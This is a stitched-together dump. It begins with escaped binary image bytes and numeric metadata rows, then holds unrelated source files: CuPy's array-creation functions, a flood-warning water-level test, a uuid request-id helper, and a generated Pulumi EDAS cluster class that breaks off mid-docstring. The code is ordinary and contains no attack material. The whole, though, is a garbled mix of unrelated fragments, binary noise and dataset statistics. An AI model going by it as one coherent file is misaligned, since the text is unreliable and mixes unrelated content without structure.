\xa9\\xff\\x88\\x88\\x88\\xff\\x03\\x03\\x03\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff:::\\xff\\x03\\x03\\x03\\xff\\x88\\x88\\x88\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\x88\\xaa\\xaa\\xaa\\x15\\xa9\\xa9\\xa9\\xeb\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x88\\x88\\x88\\xff)))\\xff\\x05\\x05\\x05\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\
\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x05\\x05\\x05\\xff)))\\xff\\x88\\x88\\x88\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xeb\\xaa\\xaa\\xaa\\x15\\xff\\xff\\xff\\x00\\xaa\\xaa\\xaaW\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa6\\xa6\\xa6\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\xa6\\xa6\\xa6\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xaa\\xaa\\xaaW\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xaa\\xaa\\xaaW\\xa9\\xa9\\xa9\\xeb\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xeb\\xaa\\xaa\\xaaW\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xaa\\xaa\\xaa\\x15\\xa9\\xa9\\xa9\\x88\\xa9\\xa9\\xa9\\xbd\\xa9\\xa9\\xa9\\xf1\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xf
f\\xa9\\xa9\\xa9\\xf1\\xa9\\xa9\\xa9\\xbe\\xa9\\xa9\\xa9\\x88\\xaa\\xaa\\xaa\\x15\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00'\np13\ntp14\nb."}
| 10,938.666667
| 20,444
| 0.60021
| 13,036
| 65,632
| 3.021095
| 0.021479
| 0.349339
| 0.263261
| 0.347663
| 0.941396
| 0.930503
| 0.929513
| 0.92738
| 0.92479
| 0.920016
| 0
| 0.203631
| 0.000503
| 65,632
| 5
| 20,445
| 13,126.4
| 0.396729
| 0
| 0
| 0
| 0
| 1.2
| 0.963981
| 0.963158
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 17
|
8a58b436d68c59696458a2751cff5fe08edd9a40
| 5,422
|
py
|
Python
|
cupy/creation/basic.py
|
fukuta0614/Chainer
|
337fe78e1c27924c1195b8b677a9b2cd3ea68828
|
[
"MIT"
] | null | null | null |
cupy/creation/basic.py
|
fukuta0614/Chainer
|
337fe78e1c27924c1195b8b677a9b2cd3ea68828
|
[
"MIT"
] | 1
|
2016-11-09T06:32:32.000Z
|
2016-11-09T10:20:04.000Z
|
cupy/creation/basic.py
|
fukuta0614/Chainer
|
337fe78e1c27924c1195b8b677a9b2cd3ea68828
|
[
"MIT"
] | 1
|
2021-05-27T16:52:11.000Z
|
2021-05-27T16:52:11.000Z
|
import cupy
def empty(shape, dtype=float):
    """Create a new array whose elements are left uninitialized.

    The ``order`` option of :func:`numpy.empty` is not supported yet.

    Args:
        shape (tuple of ints): Dimensionalities of the array.
        dtype: Data type specifier.

    Returns:
        cupy.ndarray: A new array with elements not initialized.

    .. seealso:: :func:`numpy.empty`
    """
    # TODO(beam2d): Support ordering option
    arr = cupy.ndarray(shape, dtype=dtype)
    return arr
def empty_like(a, dtype=None):
    """Create an uninitialized array matching the shape and dtype of ``a``.

    The ``order`` and ``subok`` options of :func:`numpy.empty_like` are not
    supported yet.

    Args:
        a (cupy.ndarray): Base array.
        dtype: Data type specifier. The data type of ``a`` is used by default.

    Returns:
        cupy.ndarray: A new array with same shape and dtype of ``a`` with
            elements not initialized.

    .. seealso:: :func:`numpy.empty_like`
    """
    # TODO(beam2d): Support ordering option
    return empty(a.shape, dtype=a.dtype if dtype is None else dtype)
def eye(N, M=None, k=0, dtype=float):
    """Create a 2-D array with ones on a diagonal and zeros elsewhere.

    Args:
        N (int): Number of rows.
        M (int): Number of columns. ``M == N`` by default.
        k (int): Index of the diagonal. Zero indicates the main diagonal,
            a positive index an upper diagonal, and a negative index a lower
            diagonal.
        dtype: Data type specifier.

    Returns:
        cupy.ndarray: A 2-D array with the given diagonal filled with ones
            and zeros elsewhere.

    .. seealso:: :func:`numpy.eye`
    """
    M = N if M is None else M
    result = zeros((N, M), dtype)
    # Write ones through a view of the requested diagonal.
    result.diagonal(k)[:] = 1
    return result
def identity(n, dtype=float):
    """Create a 2-D identity array.

    It is equivalent to ``eye(n, n, dtype)``.

    Args:
        n (int): Number of rows and columns.
        dtype: Data type specifier.

    Returns:
        cupy.ndarray: A 2-D identity array.

    .. seealso:: :func:`numpy.identity`
    """
    return eye(n, n, dtype=dtype)
def ones(shape, dtype=float):
    """Create a new array of the given shape and dtype, filled with ones.

    The ``order`` option of :func:`numpy.ones` is not supported yet.

    Args:
        shape (tuple of ints): Dimensionalities of the array.
        dtype: Data type specifier.

    Returns:
        cupy.ndarray: An array filled with ones.

    .. seealso:: :func:`numpy.ones`
    """
    # TODO(beam2d): Support ordering option
    return full(shape, 1, dtype=dtype)
def ones_like(a, dtype=None):
    """Create an array of ones with the same shape and dtype as ``a``.

    The ``order`` and ``subok`` options of :func:`numpy.ones_like` are not
    supported yet.

    Args:
        a (cupy.ndarray): Base array.
        dtype: Data type specifier. The dtype of ``a`` is used by default.

    Returns:
        cupy.ndarray: An array filled with ones.

    .. seealso:: :func:`numpy.ones_like`
    """
    # TODO(beam2d): Support ordering option
    return ones(a.shape, a.dtype if dtype is None else dtype)
def zeros(shape, dtype=float):
    """Returns a new array of given shape and dtype, filled with zeros.

    This function currently does not support ``order`` option.

    Args:
        shape (tuple of ints): Dimensionalities of the array.
        dtype: Data type specifier.

    Returns:
        cupy.ndarray: An array filled with zeros.

    .. seealso:: :func:`numpy.zeros`
    """
    # TODO(beam2d): Support ordering option
    a = empty(shape, dtype)
    # Zero the raw device buffer directly; cheaper than a fill kernel and
    # a bit pattern of all zeros is 0 for every supported dtype.
    a.data.memset(0, a.nbytes)
    return a
def zeros_like(a, dtype=None):
    """Returns an array of zeros with same shape and dtype as a given array.

    This function currently does not support ``order`` and ``subok`` options.

    Args:
        a (cupy.ndarray): Base array.
        dtype: Data type specifier. The dtype of ``a`` is used by default.

    Returns:
        cupy.ndarray: An array filled with zeros.

    .. seealso:: :func:`numpy.zeros_like`
    """
    # TODO(beam2d): Support ordering option
    if dtype is None:
        dtype = a.dtype
    return zeros(a.shape, dtype=dtype)
def full(shape, fill_value, dtype=None):
    """Create a new array of the given shape and dtype, filled with a value.

    The ``order`` option of :func:`numpy.full` is not supported yet.

    Args:
        shape (tuple of ints): Dimensionalities of the array.
        fill_value: A scalar value to fill a new array.
        dtype: Data type specifier.

    Returns:
        cupy.ndarray: An array filled with ``fill_value``.

    .. seealso:: :func:`numpy.full`
    """
    # TODO(beam2d): Support ordering option
    # NOTE(review): when ``dtype`` is None the dtype comes from
    # ``empty(shape, None)`` rather than being inferred from ``fill_value``
    # as :func:`numpy.full` does — confirm against cupy.ndarray's default.
    out = empty(shape, dtype)
    out.fill(fill_value)
    return out
def full_like(a, fill_value, dtype=None):
    """Create a full array with the same shape and dtype as ``a``.

    The ``order`` and ``subok`` options of :func:`numpy.full_like` are not
    supported yet.

    Args:
        a (cupy.ndarray): Base array.
        fill_value: A scalar value to fill a new array.
        dtype: Data type specifier. The dtype of ``a`` is used by default.

    Returns:
        cupy.ndarray: An array filled with ``fill_value``.

    .. seealso:: :func:`numpy.full_like`
    """
    # TODO(beam2d): Support ordering option
    return full(a.shape, fill_value, a.dtype if dtype is None else dtype)
| 25.575472
| 79
| 0.629288
| 754
| 5,422
| 4.503979
| 0.124668
| 0.048587
| 0.03828
| 0.064782
| 0.793286
| 0.767668
| 0.70318
| 0.700825
| 0.655183
| 0.644582
| 0
| 0.004027
| 0.267245
| 5,422
| 211
| 80
| 25.696682
| 0.850743
| 0.710439
| 0
| 0.324324
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.037915
| 0
| 1
| 0.27027
| false
| 0
| 0.027027
| 0
| 0.567568
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
8a6e15a32cbd9c0e36fac80495b2430c5418db5d
| 2,083
|
py
|
Python
|
test_plot.py
|
WeeraddanaKarunarathne/Flood-Warning-System
|
5c578dc2c791457e690d1deefc64d0bfb47e300e
|
[
"MIT"
] | null | null | null |
test_plot.py
|
WeeraddanaKarunarathne/Flood-Warning-System
|
5c578dc2c791457e690d1deefc64d0bfb47e300e
|
[
"MIT"
] | null | null | null |
test_plot.py
|
WeeraddanaKarunarathne/Flood-Warning-System
|
5c578dc2c791457e690d1deefc64d0bfb47e300e
|
[
"MIT"
] | null | null | null |
""" Unit test for the plot module """
from floodsystem.plot import plot_water_levels, plot_water_level_with_fit
from floodsystem.station import MonitoringStation
from floodsystem.stationdata import build_station_list, update_water_levels
from floodsystem.datafetcher import fetch_measure_levels
from floodsystem.plot import plot_water_levels
import matplotlib.pyplot as plt
import datetime
def test_plot_water_levels():
    """Check that fetched date and level series have equal length for the
    five stations with the highest latest water level.

    Fixes over the previous version: ``is not None`` instead of ``!= None``,
    removal of the dead ``else: continue`` / ``else: pass`` branches, no
    duplicate station entries when two of the top-5 levels are equal, and
    the loop-invariant ``dt`` hoisted out of the loop.
    """
    stations = build_station_list()
    update_water_levels(stations)
    # Latest readings, ignoring stations that have none.
    updated_levels = sorted(
        s.latest_level for s in stations if s.latest_level is not None)
    highest_levels = updated_levels[-5:]
    # Stations whose latest level is among the five highest (each at most once).
    station_list = [s for s in stations if s.latest_level in highest_levels]
    dt = 10  # days of history to fetch
    for item in station_list:
        dates, levels = fetch_measure_levels(
            item.measure_id, dt=datetime.timedelta(days=dt))
        assert len(dates) == len(levels)
def test_plot_water_level_with_fit():
    """Check that fetched date and level series have equal length for the
    five stations with the highest latest water level (2-day window).

    NOTE(review): despite its name this test never calls
    ``plot_water_level_with_fit`` — it only validates the fetched data;
    confirm whether a plotting call was intended.

    Fixes over the previous version: ``is not None`` instead of ``!= None``,
    removal of dead ``else`` branches, no duplicate station entries, and the
    loop-invariant ``dt`` hoisted out of the loop.
    """
    stations = build_station_list()
    update_water_levels(stations)
    # Latest readings, ignoring stations that have none.
    updated_levels = sorted(
        s.latest_level for s in stations if s.latest_level is not None)
    highest_levels = updated_levels[-5:]
    # Stations whose latest level is among the five highest (each at most once).
    station_list = [s for s in stations if s.latest_level in highest_levels]
    dt = 2  # days of history to fetch
    for item in station_list:
        dates, levels = fetch_measure_levels(
            item.measure_id, dt=datetime.timedelta(days=dt))
        assert len(dates) == len(levels)
| 27.773333
| 94
| 0.643783
| 244
| 2,083
| 5.233607
| 0.22541
| 0.077525
| 0.084573
| 0.062647
| 0.824589
| 0.791699
| 0.765857
| 0.703211
| 0.703211
| 0.703211
| 0
| 0.004676
| 0.281325
| 2,083
| 75
| 95
| 27.773333
| 0.848363
| 0.013922
| 0
| 0.792453
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.037736
| 1
| 0.037736
| false
| 0.037736
| 0.132075
| 0
| 0.169811
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8a8ae1564606519f1fead981dc2e19a4fc275991
| 61
|
py
|
Python
|
api/utils/common_util.py
|
pengtianabc/sanic-app
|
5c9327151871a11972cc03dbe61576601703789e
|
[
"MIT"
] | null | null | null |
api/utils/common_util.py
|
pengtianabc/sanic-app
|
5c9327151871a11972cc03dbe61576601703789e
|
[
"MIT"
] | null | null | null |
api/utils/common_util.py
|
pengtianabc/sanic-app
|
5c9327151871a11972cc03dbe61576601703789e
|
[
"MIT"
] | null | null | null |
import uuid
def GenRequestId():
    """Return a fresh request id as a 32-character lowercase hex string.

    NOTE(review): ``uuid1`` embeds the host MAC address and a timestamp;
    switch to ``uuid4`` if request ids must not leak host information.
    """
    request_uuid = uuid.uuid1()
    return request_uuid.hex
| 20.333333
| 27
| 0.704918
| 8
| 61
| 5.375
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.02
| 0.180328
| 61
| 3
| 27
| 20.333333
| 0.84
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
8a9842bb5ff755a0480190615119f33702eceaac
| 16,521
|
py
|
Python
|
sdk/python/pulumi_alicloud/edas/cluster.py
|
pulumi/pulumi-alicloud
|
9c34d84b4588a7c885c6bec1f03b5016e5a41683
|
[
"ECL-2.0",
"Apache-2.0"
] | 42
|
2019-03-18T06:34:37.000Z
|
2022-03-24T07:08:57.000Z
|
sdk/python/pulumi_alicloud/edas/cluster.py
|
pulumi/pulumi-alicloud
|
9c34d84b4588a7c885c6bec1f03b5016e5a41683
|
[
"ECL-2.0",
"Apache-2.0"
] | 152
|
2019-04-15T21:03:44.000Z
|
2022-03-29T18:00:57.000Z
|
sdk/python/pulumi_alicloud/edas/cluster.py
|
pulumi/pulumi-alicloud
|
9c34d84b4588a7c885c6bec1f03b5016e5a41683
|
[
"ECL-2.0",
"Apache-2.0"
] | 3
|
2020-08-26T17:30:07.000Z
|
2021-07-05T01:37:45.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['ClusterArgs', 'Cluster']
@pulumi.input_type
class ClusterArgs:
    # NOTE: machine-generated by the Pulumi Terraform Bridge (tfgen) — see the
    # file-header warning; keep edits to comments only.  Holds the input
    # arguments for creating an edas.Cluster resource; values are stored via
    # pulumi.set/get so the SDK can track them as resource inputs.
    def __init__(__self__, *,
                 cluster_name: pulumi.Input[str],
                 cluster_type: pulumi.Input[int],
                 network_mode: pulumi.Input[int],
                 logical_region_id: Optional[pulumi.Input[str]] = None,
                 vpc_id: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing a Cluster resource.
        :param pulumi.Input[str] cluster_name: The name of the cluster that you want to create.
        :param pulumi.Input[int] cluster_type: The type of the cluster that you want to create. Valid values only: 2: ECS cluster.
        :param pulumi.Input[int] network_mode: The network type of the cluster that you want to create. Valid values: 1: classic network. 2: VPC.
        :param pulumi.Input[str] logical_region_id: The ID of the namespace where you want to create the application. You can call the ListUserDefineRegion operation to query the namespace ID.
        :param pulumi.Input[str] vpc_id: The ID of the Virtual Private Cloud (VPC) for the cluster.
        """
        pulumi.set(__self__, "cluster_name", cluster_name)
        pulumi.set(__self__, "cluster_type", cluster_type)
        pulumi.set(__self__, "network_mode", network_mode)
        # Optional inputs are only recorded when supplied.
        if logical_region_id is not None:
            pulumi.set(__self__, "logical_region_id", logical_region_id)
        if vpc_id is not None:
            pulumi.set(__self__, "vpc_id", vpc_id)
    @property
    @pulumi.getter(name="clusterName")
    def cluster_name(self) -> pulumi.Input[str]:
        """
        The name of the cluster that you want to create.
        """
        return pulumi.get(self, "cluster_name")
    @cluster_name.setter
    def cluster_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "cluster_name", value)
    @property
    @pulumi.getter(name="clusterType")
    def cluster_type(self) -> pulumi.Input[int]:
        """
        The type of the cluster that you want to create. Valid values only: 2: ECS cluster.
        """
        return pulumi.get(self, "cluster_type")
    @cluster_type.setter
    def cluster_type(self, value: pulumi.Input[int]):
        pulumi.set(self, "cluster_type", value)
    @property
    @pulumi.getter(name="networkMode")
    def network_mode(self) -> pulumi.Input[int]:
        """
        The network type of the cluster that you want to create. Valid values: 1: classic network. 2: VPC.
        """
        return pulumi.get(self, "network_mode")
    @network_mode.setter
    def network_mode(self, value: pulumi.Input[int]):
        pulumi.set(self, "network_mode", value)
    @property
    @pulumi.getter(name="logicalRegionId")
    def logical_region_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the namespace where you want to create the application. You can call the ListUserDefineRegion operation to query the namespace ID.
        """
        return pulumi.get(self, "logical_region_id")
    @logical_region_id.setter
    def logical_region_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "logical_region_id", value)
    @property
    @pulumi.getter(name="vpcId")
    def vpc_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the Virtual Private Cloud (VPC) for the cluster.
        """
        return pulumi.get(self, "vpc_id")
    @vpc_id.setter
    def vpc_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "vpc_id", value)
@pulumi.input_type
class _ClusterState:
    # NOTE: machine-generated by the Pulumi Terraform Bridge (tfgen) — keep
    # edits to comments only.  Mirrors ClusterArgs but with every field
    # optional: used for looking up / filtering existing Cluster state rather
    # than creating a new resource.
    def __init__(__self__, *,
                 cluster_name: Optional[pulumi.Input[str]] = None,
                 cluster_type: Optional[pulumi.Input[int]] = None,
                 logical_region_id: Optional[pulumi.Input[str]] = None,
                 network_mode: Optional[pulumi.Input[int]] = None,
                 vpc_id: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering Cluster resources.
        :param pulumi.Input[str] cluster_name: The name of the cluster that you want to create.
        :param pulumi.Input[int] cluster_type: The type of the cluster that you want to create. Valid values only: 2: ECS cluster.
        :param pulumi.Input[str] logical_region_id: The ID of the namespace where you want to create the application. You can call the ListUserDefineRegion operation to query the namespace ID.
        :param pulumi.Input[int] network_mode: The network type of the cluster that you want to create. Valid values: 1: classic network. 2: VPC.
        :param pulumi.Input[str] vpc_id: The ID of the Virtual Private Cloud (VPC) for the cluster.
        """
        # Every field is optional state; only record the ones supplied.
        if cluster_name is not None:
            pulumi.set(__self__, "cluster_name", cluster_name)
        if cluster_type is not None:
            pulumi.set(__self__, "cluster_type", cluster_type)
        if logical_region_id is not None:
            pulumi.set(__self__, "logical_region_id", logical_region_id)
        if network_mode is not None:
            pulumi.set(__self__, "network_mode", network_mode)
        if vpc_id is not None:
            pulumi.set(__self__, "vpc_id", vpc_id)
    @property
    @pulumi.getter(name="clusterName")
    def cluster_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the cluster that you want to create.
        """
        return pulumi.get(self, "cluster_name")
    @cluster_name.setter
    def cluster_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "cluster_name", value)
    @property
    @pulumi.getter(name="clusterType")
    def cluster_type(self) -> Optional[pulumi.Input[int]]:
        """
        The type of the cluster that you want to create. Valid values only: 2: ECS cluster.
        """
        return pulumi.get(self, "cluster_type")
    @cluster_type.setter
    def cluster_type(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "cluster_type", value)
    @property
    @pulumi.getter(name="logicalRegionId")
    def logical_region_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the namespace where you want to create the application. You can call the ListUserDefineRegion operation to query the namespace ID.
        """
        return pulumi.get(self, "logical_region_id")
    @logical_region_id.setter
    def logical_region_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "logical_region_id", value)
    @property
    @pulumi.getter(name="networkMode")
    def network_mode(self) -> Optional[pulumi.Input[int]]:
        """
        The network type of the cluster that you want to create. Valid values: 1: classic network. 2: VPC.
        """
        return pulumi.get(self, "network_mode")
    @network_mode.setter
    def network_mode(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "network_mode", value)
    @property
    @pulumi.getter(name="vpcId")
    def vpc_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the Virtual Private Cloud (VPC) for the cluster.
        """
        return pulumi.get(self, "vpc_id")
    @vpc_id.setter
    def vpc_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "vpc_id", value)
class Cluster(pulumi.CustomResource):
    # NOTE: machine-generated by the Pulumi Terraform Bridge (tfgen) — keep
    # edits to comments only.  The two @overload __init__ stubs exist purely
    # for type checkers; the real entry point is the third __init__, which
    # dispatches to _internal_init.
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 cluster_name: Optional[pulumi.Input[str]] = None,
                 cluster_type: Optional[pulumi.Input[int]] = None,
                 logical_region_id: Optional[pulumi.Input[str]] = None,
                 network_mode: Optional[pulumi.Input[int]] = None,
                 vpc_id: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        Provides an EDAS cluster resource.
        > **NOTE:** Available in 1.82.0+
        ## Example Usage
        Basic Usage
        ```python
        import pulumi
        import pulumi_alicloud as alicloud
        default = alicloud.edas.Cluster("default",
            cluster_name=var["cluster_name"],
            cluster_type=var["cluster_type"],
            network_mode=var["network_mode"],
            logical_region_id=var["logical_region_id"],
            vpc_id=var["vpc_id"])
        ```
        ## Import
        EDAS cluster can be imported using the id, e.g.
        ```sh
        $ pulumi import alicloud:edas/cluster:Cluster cluster cluster_id
        ```
        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] cluster_name: The name of the cluster that you want to create.
        :param pulumi.Input[int] cluster_type: The type of the cluster that you want to create. Valid values only: 2: ECS cluster.
        :param pulumi.Input[str] logical_region_id: The ID of the namespace where you want to create the application. You can call the ListUserDefineRegion operation to query the namespace ID.
        :param pulumi.Input[int] network_mode: The network type of the cluster that you want to create. Valid values: 1: classic network. 2: VPC.
        :param pulumi.Input[str] vpc_id: The ID of the Virtual Private Cloud (VPC) for the cluster.
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: ClusterArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Provides an EDAS cluster resource.
        > **NOTE:** Available in 1.82.0+
        ## Example Usage
        Basic Usage
        ```python
        import pulumi
        import pulumi_alicloud as alicloud
        default = alicloud.edas.Cluster("default",
            cluster_name=var["cluster_name"],
            cluster_type=var["cluster_type"],
            network_mode=var["network_mode"],
            logical_region_id=var["logical_region_id"],
            vpc_id=var["vpc_id"])
        ```
        ## Import
        EDAS cluster can be imported using the id, e.g.
        ```sh
        $ pulumi import alicloud:edas/cluster:Cluster cluster cluster_id
        ```
        :param str resource_name: The name of the resource.
        :param ClusterArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Runtime dispatcher: figures out which overload the caller used and
        # normalizes both forms into a call to _internal_init.
        resource_args, opts = _utilities.get_resource_args_opts(ClusterArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)
    def _internal_init(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 cluster_name: Optional[pulumi.Input[str]] = None,
                 cluster_type: Optional[pulumi.Input[int]] = None,
                 logical_region_id: Optional[pulumi.Input[str]] = None,
                 network_mode: Optional[pulumi.Input[int]] = None,
                 vpc_id: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        # Validate options, then build the property bag and register the
        # resource with the Pulumi engine.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # Creating a new resource (an id would mean "adopt existing").
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = ClusterArgs.__new__(ClusterArgs)
            # Required properties may only be omitted when rehydrating from a URN.
            if cluster_name is None and not opts.urn:
                raise TypeError("Missing required property 'cluster_name'")
            __props__.__dict__["cluster_name"] = cluster_name
            if cluster_type is None and not opts.urn:
                raise TypeError("Missing required property 'cluster_type'")
            __props__.__dict__["cluster_type"] = cluster_type
            __props__.__dict__["logical_region_id"] = logical_region_id
            if network_mode is None and not opts.urn:
                raise TypeError("Missing required property 'network_mode'")
            __props__.__dict__["network_mode"] = network_mode
            __props__.__dict__["vpc_id"] = vpc_id
        super(Cluster, __self__).__init__(
            'alicloud:edas/cluster:Cluster',
            resource_name,
            __props__,
            opts)
    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            cluster_name: Optional[pulumi.Input[str]] = None,
            cluster_type: Optional[pulumi.Input[int]] = None,
            logical_region_id: Optional[pulumi.Input[str]] = None,
            network_mode: Optional[pulumi.Input[int]] = None,
            vpc_id: Optional[pulumi.Input[str]] = None) -> 'Cluster':
        """
        Get an existing Cluster resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.
        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
